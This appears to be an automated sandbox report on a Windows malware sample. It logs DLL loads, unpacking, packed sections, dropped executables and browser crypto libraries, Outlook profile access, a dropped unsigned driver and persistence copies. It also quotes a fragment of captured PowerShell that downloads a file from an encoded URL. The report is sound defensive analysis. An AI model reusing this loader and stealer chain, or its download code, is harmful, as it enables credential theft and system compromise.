Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: msi.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\6ccacd8608530f
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Directory created: C:\Program Files\Google\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Directory created: C:\Program Files\Google\2ad47189800c09

Source: file.exe

Static file information: File size 1806336 > 1048576

Source: file.exe

Static PE information: Raw size of ykpsajjh is bigger than: 0x100000 < 0x19ea00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2126531064.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wextract.pdb source: ntRoEwh.exe, 0000001A.00000000.2530156502.00007FF6D9529000.00000002.00000001.01000000.00000014.sdmp, ntRoEwh.exe, 0000001A.00000002.2953474777.00007FF6D9529000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: mountvol.pdb source: wTMEVe8.exe, 00000010.00000002.2455002578.0000000000400000.00000040.00000400.00020000.00000000.sdmp, XXgM7ZsSvR.exe, 00000011.00000000.2453810245.00007FF6EBBC4000.00000002.00000001.01000000.00000010.sdmp, XXgM7ZsSvR.exe, 00000011.00000002.2455244887.00007FF6EBBC4000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: wextract.pdbGCTL source: ntRoEwh.exe, 0000001A.00000000.2530156502.00007FF6D9529000.00000002.00000001.01000000.00000014.sdmp, ntRoEwh.exe, 0000001A.00000002.2953474777.00007FF6D9529000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: mountvol.pdbGCTL source: wTMEVe8.exe, 00000010.00000002.2455002578.0000000000400000.00000040.00000400.00020000.00000000.sdmp, XXgM7ZsSvR.exe, 00000011.00000000.2453810245.00007FF6EBBC4000.00000002.00000001.01000000.00000010.sdmp, XXgM7ZsSvR.exe, 00000011.00000002.2455244887.00007FF6EBBC4000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2126531064.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: protobuf-net.pdb source: callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: -.PDB source: explorer.exe, 00000027.00000003.2805473467.0000000003B06000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2827321183.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2964209931.0000000003C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2834435398.00000000046E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2848745989.0000000004059000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2816470410.0000000004051000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ykpsajjh:EW;lvskadyv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ykpsajjh:EW;lvskadyv:EW;.taggant:EW;
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Unpacked PE file: 9.2.DBFIEHDHII.exe.d40000.0.unpack :EW;.rsrc:W;.idata :W;ybivbako:EW;iccljchg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybivbako:EW;iccljchg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 10.2.skotes.exe.dd0000.0.unpack :EW;.rsrc:W;.idata :W;ybivbako:EW;iccljchg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybivbako:EW;iccljchg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 11.2.skotes.exe.dd0000.0.unpack :EW;.rsrc:W;.idata :W;ybivbako:EW;iccljchg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybivbako:EW;iccljchg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 12.2.skotes.exe.dd0000.0.unpack :EW;.rsrc:W;.idata :W;ybivbako:EW;iccljchg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybivbako:EW;iccljchg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Unpacked PE file: 34.2.60c1233683.exe.1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nywettin:EW;pnoojtlk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nywettin:EW;pnoojtlk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Unpacked PE file: 35.2.50c9f14fb7.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ykpsajjh:EW;lvskadyv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ykpsajjh:EW;lvskadyv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Unpacked PE file: 43.2.60c1233683.exe.1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nywettin:EW;pnoojtlk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nywettin:EW;pnoojtlk:EW;.taggant:EW;

.NET source code contains potential unpacker

Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, 1a2.cs	.Net Code: ghM System.Reflection.Assembly.Load(byte[])
Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, 857.cs	.Net Code: _736

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($encoded_url))) -OutFile $output -UseBasicParsing -ErrorAction SilentlyContinue} Catch { # ??????}# ????? IV$key = [System.Text.Encoding]::UTF8.GetBytes("blMgb+WrfPrXMFxK7ymKPM3SVH

Yara detected Costura Assembly Loader

Source: Yara match	File source: 27.2.callmobile.exe.5e80000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2962692398.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3362367809.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: callmobile.exe PID: 1640, type: MEMORYSTR

Source: ntRoEwh[1].exe.12.dr

Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.12.dr	Static PE information: real checksum: 0x1d2641 should be: 0x1cd0e6
Source: 50c9f14fb7.exe.12.dr	Static PE information: real checksum: 0x1c519f should be: 0x1bd50e
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x1c519f should be: 0x1bd50e
Source: wTMEVe8.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x3fc36c
Source: 60c1233683.exe.12.dr	Static PE information: real checksum: 0x1d2641 should be: 0x1cd0e6
Source: wTMEVe8[1].exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x3fc36c
Source: DBFIEHDHII.exe.0.dr	Static PE information: real checksum: 0x3248c5 should be: 0x32364a
Source: random[1].exe1.12.dr	Static PE information: real checksum: 0x2bc6bd should be: 0x2bc594
Source: file.exe	Static PE information: real checksum: 0x1c519f should be: 0x1bd50e
Source: skotes.exe.9.dr	Static PE information: real checksum: 0x3248c5 should be: 0x32364a

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: ykpsajjh
Source: file.exe	Static PE information: section name: lvskadyv
Source: file.exe	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: DBFIEHDHII.exe.0.dr	Static PE information: section name:
Source: DBFIEHDHII.exe.0.dr	Static PE information: section name: .idata
Source: DBFIEHDHII.exe.0.dr	Static PE information: section name: ybivbako
Source: DBFIEHDHII.exe.0.dr	Static PE information: section name: iccljchg
Source: DBFIEHDHII.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: ykpsajjh
Source: random[1].exe.0.dr	Static PE information: section name: lvskadyv
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name: ybivbako
Source: skotes.exe.9.dr	Static PE information: section name: iccljchg
Source: skotes.exe.9.dr	Static PE information: section name: .taggant
Source: random[1].exe.12.dr	Static PE information: section name:
Source: random[1].exe.12.dr	Static PE information: section name: .idata
Source: random[1].exe.12.dr	Static PE information: section name:
Source: random[1].exe.12.dr	Static PE information: section name: nywettin
Source: random[1].exe.12.dr	Static PE information: section name: pnoojtlk
Source: random[1].exe.12.dr	Static PE information: section name: .taggant
Source: 60c1233683.exe.12.dr	Static PE information: section name:
Source: 60c1233683.exe.12.dr	Static PE information: section name: .idata
Source: 60c1233683.exe.12.dr	Static PE information: section name:
Source: 60c1233683.exe.12.dr	Static PE information: section name: nywettin
Source: 60c1233683.exe.12.dr	Static PE information: section name: pnoojtlk
Source: 60c1233683.exe.12.dr	Static PE information: section name: .taggant
Source: 50c9f14fb7.exe.12.dr	Static PE information: section name:
Source: 50c9f14fb7.exe.12.dr	Static PE information: section name: .idata
Source: 50c9f14fb7.exe.12.dr	Static PE information: section name:
Source: 50c9f14fb7.exe.12.dr	Static PE information: section name: ykpsajjh
Source: 50c9f14fb7.exe.12.dr	Static PE information: section name: lvskadyv
Source: 50c9f14fb7.exe.12.dr	Static PE information: section name: .taggant
Source: random[1].exe1.12.dr	Static PE information: section name:
Source: random[1].exe1.12.dr	Static PE information: section name: .idata
Source: random[1].exe1.12.dr	Static PE information: section name: cvbdjiir
Source: random[1].exe1.12.dr	Static PE information: section name: klvbmdih
Source: random[1].exe1.12.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D5D91C push ecx; ret	9_2_00D5D92F
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D51359 push es; ret	9_2_00D5135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00DED91C push ecx; ret	10_2_00DED92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00DED91C push ecx; ret	11_2_00DED92F

Source: file.exe	Static PE information: section name: ykpsajjh entropy: 7.953200538195439
Source: DBFIEHDHII.exe.0.dr	Static PE information: section name: entropy: 7.045761242577015
Source: random[1].exe.0.dr	Static PE information: section name: ykpsajjh entropy: 7.953200538195439
Source: skotes.exe.9.dr	Static PE information: section name: entropy: 7.045761242577015
Source: random[1].exe.12.dr	Static PE information: section name: entropy: 7.981395527238229
Source: random[1].exe.12.dr	Static PE information: section name: nywettin entropy: 7.9540766651789925
Source: 60c1233683.exe.12.dr	Static PE information: section name: entropy: 7.981395527238229
Source: 60c1233683.exe.12.dr	Static PE information: section name: nywettin entropy: 7.9540766651789925
Source: 50c9f14fb7.exe.12.dr	Static PE information: section name: ykpsajjh entropy: 7.953200538195439
Source: random[1].exe1.12.dr	Static PE information: section name: entropy: 7.793604451994208

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Documents\DBFIEHDHII.exe

Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe

File created: C:\Users\user\AppData\Local\Temp\jbrdiqcrtdja.sys

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\WDUsXAjy.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\cLzjLovK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	File created: C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\KhRLcxhs.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\TNeBQEiF.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\ProgramData\Package Cache\SystemSettings.exe	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\NjDuyglo.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\rYNynbxj.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\XXhkisgW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\gmoIHdog.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\cvxRAgnn.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\yyQNbzJv.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\FwENDODk.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\qMYGMWSI.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\tSQOebbY.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\IwlvVjWA.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\BVPoHZLO.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\wTMEVe8[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\CFNWwRDq.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Recovery\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	File created: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\DBkeOEgG.log	Jump to dropped file
Source: C:\Users\user\Documents\DBFIEHDHII.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\hGBASUlD.log	Jump to dropped file
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	File created: C:\Users\user\AppData\Local\Temp\jbrdiqcrtdja.sys	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\pXgQVFeT.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Program Files\Google\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\YUJsDsvR.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\ZoAIeOtr.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\aINBpFrP.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\vIZXTCIC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Documents\DBFIEHDHII.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\lZGHkaDU.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ntRoEwh[1].exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\ProgramData\Package Cache\SystemSettings.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
